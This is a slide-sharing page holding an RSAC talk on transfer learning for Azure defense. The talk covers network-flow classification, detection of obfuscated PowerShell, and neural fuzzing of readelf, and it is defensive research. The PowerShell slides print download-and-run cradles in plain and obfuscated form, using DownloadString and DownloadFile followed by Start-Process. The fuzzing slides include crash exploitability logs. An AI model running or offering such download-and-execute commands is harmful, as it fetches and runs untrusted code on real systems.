Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

Más de Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Último

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 

Último (20)

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 

Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense

  • 1. SESSION ID: #RSAC Mark Russinovich TRANSFER LEARNING: REPURPOSING ML ALGORITHMS FROM DIFFERENT DOMAINS TO CLOUD DEFENSE CSV-W02 CTO, Microsoft Azure Microsoft @markrussinovich
  • 2. #RSAC Leveraging intelligence across product lines SQL Server + R Microsoft R Server Hadoop + R Spark + R Azure Machine Learning Cortana Intelligence Suite R Tools/Python Tools for Visual Studio Azure Notebooks (JuPyTer) Cognitive Services Bot Framework Cortana Office 365 Bing SkypeHoloLens R Server Microsoft CNTK Xbox 360 Dynamics 365
  • 3. #RSAC Microsoft’s cloud security scale - Daily numbers 500 Million Number of active Microsoft account users 18 Billion Microsoft Account authentications 77 Million Threats detected on devices 30 Million Geo Login Anomaly Attacks deflected 1.5 Million Number of compromise attempts deflected
  • 5. #RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
  • 6. #RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
  • 7. #RSAC Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Fact | Industry grade ML solutions are highly exploratory Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Attempt 1 Attempt 2 Attempt 3 Attempt 4 Attempt n
  • 8. #RSAC Product Managers Machine Learning Experts Security Experts Assess security landscape and identify monitoring opportunities Update solution based on customer feedback Gather customer feedback and improve product Compliance and Privacy Ops Engineers Engineers Engineer for low latency, high throughput and scale Monitor performance and mitigate, resolve, preempt outages Ensure solution is compliant to privacy laws Fact | Industry grade security data science requires multiple experts
  • 10. #RSAC Traditional versus Transfer learning Learning system Learning system Learning system Different tasks Traditional Machine Learning Transfer Learning Source tasks Learning system Target task Source: Pan, Sinno Jialin, and Qiang Yang. "A survey on transfer learning." IEEE Transactions on knowledge and data engineering
  • 11. #RSAC Why transfer learning Commercial success Time 2016 Supervised learning Transfer learning Unsupervised learning Reinforcement learning Drivers of ML success in industry Source: Ruder, Sebastian, “Transfer Learning - Machine Learning's Next Frontier
  • 12. #RSAC Problem Build a generic approach to detecting malicious incoming network activity that works for all protocols Hypothesis Underlying network protocols, though different, have similar behavior Solution Detect Attacker IPs using Ensemble Tree Learning Previous No previous approach for generic protocol suspicious activity for Cloud VM Case Study 1 | Detecting malicious network activity in Azure Core Concept: Achieve transfer learning by grouping similar tasks
  • 13. #RSAC Ensemble Tree Learning applications at Microsoft
  • 14. #RSAC To get labels compare Input data Description Number of outgoing SYN in short interactions (log) Number of outgoing SYN in short interactions Total percent outgoing SYN Percent outgoing SYN in short interactions Number of incoming FIN Distinct incoming connections relative to total flows Frequency of top most used port Hourly standard deviation of destination IPs Percent of outgoing SYN in long interactions (log) Number of outgoing SYN Number of flows on low frequency (rare) ports Percent of outgoing FIN messages Ratio of outgoing to incoming flows (TCP) Ratio of outgoing to incoming flows (total) Total number outgoing SYN Features extractedIPFix data from Azure VMs IP address in the IPFix data: 10.2.3.40 3rd party threat intelligence feeds Cyber Defense Operation Threat Intelligence Center MSRC Previous Red team activities If an IP from IPFix data is also present in TI feeds, label flow as malicious
  • 15. #RSAC Tree Ensembles – Algorithm Create subsets from the training data by randomly sampling with replacement Nexamples M features
  • 16. #RSAC Tree Ensembles – Training Rare Ports Flows Number of Outgoing SYN Frequency of Top Port Number of Incoming Flows Standard Deviation of IPs Number of Incoming FIN Malicious MaliciousBenign MaliciousBenign MaliciousBenign Nexamples M features
  • 17. #RSAC Tree Ensembles – Training Standard Deviation of IPs Number of Outgoing SYN Frequency of Top Port Number of Incoming FIN Malicious MaliciousBenign Benign Benign Nexamples M features
  • 19. #RSAC Take the majority vote of the ensemble New Record Tree Ensembles – Testing Malicious Benign Benign Src Ip Dst IP Src Port DST Port In Int Out Int DSCP Octets 10.1.1.5 10.2.2.8 2887 80 Eth0 Eth1 00 982
  • 20. #RSAC Model performance and productization Model trained at regular intervals Size of data: 3GB/hour Communication with 5 Million different IPs per hour Completed within seconds Classification runs multiple times a day Completed within milliseconds Dataset True positive rate False positive rate Non Ensemble Learning 82% 0.06% Ensemble Learning 85% 0.06% Azure Security Center3 points improvement
  • 21. #RSAC Bonus Classifier can be used as an effective canary for emerging attacks #ofdetectedsuspiciousMongoDBscans http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-ransom-attacks/ Time (days)
  • 22. #RSAC WannaCry Attack Timeline 1. Prior to the MS017-10 patch release, the SMB (port 445) scanning activity in Azure behaved per the standard baseline – i.e. sporadic incoming scans 2. Once released, we can notice a gradual increase in the number of successful scans (i.e. target responded) due to: a. Official Microsoft patch being released – I.e. A small group of reverse engineers uncovered the bug b. Metasploit module released to the public, making it easier to discover and exploit the vulnerability c. Shadow Broker tool leaked, improving the Metasploit attack module and making it more widespread 3. A week before the attack, we can notice a sharp peak in the number of successful incoming scans over SMB – signaling a significant interest in the SMB protocol #ofdetectedsuspiciousSMBscans Any targeted attacked here? Standard SMB (445) Azure scanning activity 1 Increased SMB (445) Azure scanning activity 2 Abnormal peak in scanning 3 MS017-10 Patch released Metasploit exploit released Shadow Broker exploiter leak A week before the attack Attack started Time (days)
  • 23. #RSAC Case Study 2 | Detecting Malicious PowerShell commands Problem Statement Detect malicious PowerShell command lines Hypothesis Deep learning methods are capable of efficient and precise detection of malicious PowerShell commands Solution Collect large data set from Microsoft Defender and apply Microsoft’s Deep Learning toolkit (CNTK) for detection Previous Used machine learning (3-gram sequence modeling) Results: True positive rate = 89% Core Concept: Transposing existing security problem into an already solved problem from another domain
  • 24. #RSAC PowerShell command lines – difficult to detect &( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' )) Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t') Source: Bohannon, Daniel. “Invoke Obfuscation”, BlueHat 2016. Command line: before obfuscation Command line: after obfuscation Rules don’t work well, because too many regexes needs to be written Classical machine learning doesn’t work well, because every command line is unique No discernable pattern
  • 25. #RSAC
  • 27. #RSAC Microsoft’s Deep Learning toolkit (CNTK) applications
  • 28. #RSAC Deeper learning = representation learning Deep learning network Input layer Hidden layer 1 Hidden layer 2 Hidden layer 3 Output layer
  • 29. #RSAC Deep learning system trained for image recognition "-ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'*bs*.exe';(New-Object Net.WebClient).DownloadFile('http://*pf*.top /http/',$uytcccs);Start-Process $uytcccs" & { (get- date).ToUniversalTime().ToString('yyyy-MM- dd-HH:mm:ss.fff') } Convert PowerShell commands to images Technique overview
  • 30. #RSAC Model performance and productization 6 points improvement! Model trained in regular intervals Size of data: 400GB per day Completed within minutes Classification runs multiple times a day Completed within seconds Dataset True positive rate False positive rate Previous method 89% 0.004% Deep learning 95.7% 0.004%
  • 31. #RSAC Case Study 3 | Neural Fuzzing Problem Statement Fuzz-testing file parsers to discover security vulnerabilities Hypothesis Fuzz testing heuristics can be learned and generalized from an existing graybox fuzzer. Some control locations are more interesting to fuzz than others. Solution Insert a neural model in the fuzz/test feedback loop. Learn and generalize a strategy from an existing fuzzer (AFL), using sequence to sequence neural architectures. Augment original fuzzer with generalized strategy. Previous Blackbox fuzzing: e.g. random mutations Whitebox fuzzing: e.g. dynamic analysis Graybox fuzzing: human crafted mutation heuristics aimed at maximizing code coverage Core Concept: Transposing existing security problem into an already solved problem from another domain
  • 33. #RSAC Improved fuzzing intuition Model Input: Mutated files that have increased code coverage Encode input file content as a sequence of bytes Train with neural network architectures good at handling variable length sequences: LSTM, sequence-to-sequence Learned function Heatmaps of “usefulness” rating for each bit location in the input file Scoring Measured as potential to help discover new code paths 1 = mutation at this location will likely help discover new code paths 0 = ignore file location from mutation
  • 34. #RSAC readelf dataset example 180 input files divided into training and validation sets 24h run of AFL on training set Training data collected Mutated files generated by AFL Code-coverage bitmaps from execution of the target program on mutated inputs Sampled at 1% Training Validation ~200kb per file
  • 35. #RSAC Example | readelf 2.28 model Heatmap produced for one given ELF file Red locations are deemed interesting to mutate ELF Header format (Source: Wikipedia) … … … … 0x3A 2 e_shentsize size of a section header table entry. 0x3C 2 e_shnum number of entries in the section header table. 0x3E 2 e_shstrndx index of the section header table entry that contains the section names.
  • 36. #RSAC
  • 37. #RSAC Analysis by GDB exploitable plugin https://github.com/jfoote/exploitable Target: Linux readelf 2.28 Program received signal SIGSEGV, Segmentation fault. 0x000000000055e30b in byte_put_little_endian (field=0x1007dd6f6 <error: Cannot access memory at address 0x1007dd6f6>, value=0, size=2) at elfcomm.c:81 Description: Access violation on destination operand Short description: DestAv (8/22) Hash: 23ebf3e1c7d53d629ee996b7a33e133e.eddea00d61e72e006d47dab261ea1f05 Exploitability Classification: EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000045a9f3 in target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7ddfb8) at readelf.c:11629 Description: Access violation on source operand Short description: SourceAv (19/22) Hash: 6f55d3fddb7262be6e31745ee2574742.d27dd344b9a2892fc0d4d4f739f2f639 Exploitability Classification: UNKNOWN Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. 0x000000000055e283 in byte_put_little_endian (field=0xff000000007de2f2 <error: Cannot access memory at address 0xff000000007de2f2>, value=18446744073709551611, size=4) at elfcomm.c:75 Description: Access violation Short description: AccessViolation (21/22) Hash: 5a23cb8faf4189a00a5872ce9565218c.5de26e356c24993825d74ceade27e81f Exploitability Classification: UNKNOWN Explanation: The target crashed due to an access violation but there is not enough additional information available to determine exploitability. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 Description: Heap error Short description: HeapError (10/22) Hash: cc68e1a9699d9946c2efe4adb95e6f13.f6583f17f75906da3c88b0cd8e5d6c7a Exploitability Classification: EXPLOITABLE Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. Other tags: AbortSignal (20/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dd828) at readelf.c:11666 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: e0167387d6ee8286447199f310e69c4d.faf899c223c7d3c22b94eba413b011f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) Program received signal SIGSEGV, Segmentation fault. target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dde40) at readelf.c:11695 Description: Access violation near NULL on source operand Short description: SourceAvNearNull (16/22) Hash: 73ce00dc337b153d0ecef457ecb08164.37705e2795c3218a99249070847f80f8 Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a s imple NULL dereference to data structure that has no immediate effect on control of the processor. Other tags: AccessViolation (21/22) CVE-2017-6965 6 crash sites: 2 EXPLOITABLE, 2 UNKNOWN, 2 NOT EXPLOITABLE Found by Neural AFL but not standard AFL | All fixed in readelf 2.30
  • 38. #RSAC Readelf model performance over 48h and productization Model trained Size of data: 20 GB Collected from: a 24h fuzzing run of AFL Completed within: 12h Model query AFL modified to query model 50% of the time Dataset Unique Code Paths Number of Crashes AFL 8,123 1 Neural 9,207 62 Bugs reproduced, triaged, and reported automatically in MSRD web portal for software being tested (https://www.microsoft.com/en-us/security-risk-detection/)
  • 39. #RSAC Conclusion • Transfer Learning helps • To reuse already developed algorithms in an organization • To conserve resources across projects • Three Early Attempts at Transfer Learning: • Detecting Malicious Network Activity in Azure • Detecting Obfuscated PowerShell command lines • Fuzzing using Neural Nets
  • 40. #RSAC Resources • Microsoft Booth at RSA • Experiment with Transfer Learning - https://docs.microsoft.com/en-us/cognitive- toolkit/Build-your-own-image-classifier-using-Transfer-Learning • Publications: • Detecting Obfuscated PowerShell - https://arxiv.org/pdf/1804.04177.pdf • Neural Fuzzing - https://www.microsoft.com/en-us/research/publication/not-all- bytes-are-equal-neural-byte-sieve-for-fuzzing/ • Free Online Training: • Azure Security and Compliance (edX) - https://www.edx.org/course/azure-security- and-compliance • Microsoft Professional Program For AI https://academy.microsoft.com/en- us/professional-program/tracks/artificial-intelligence/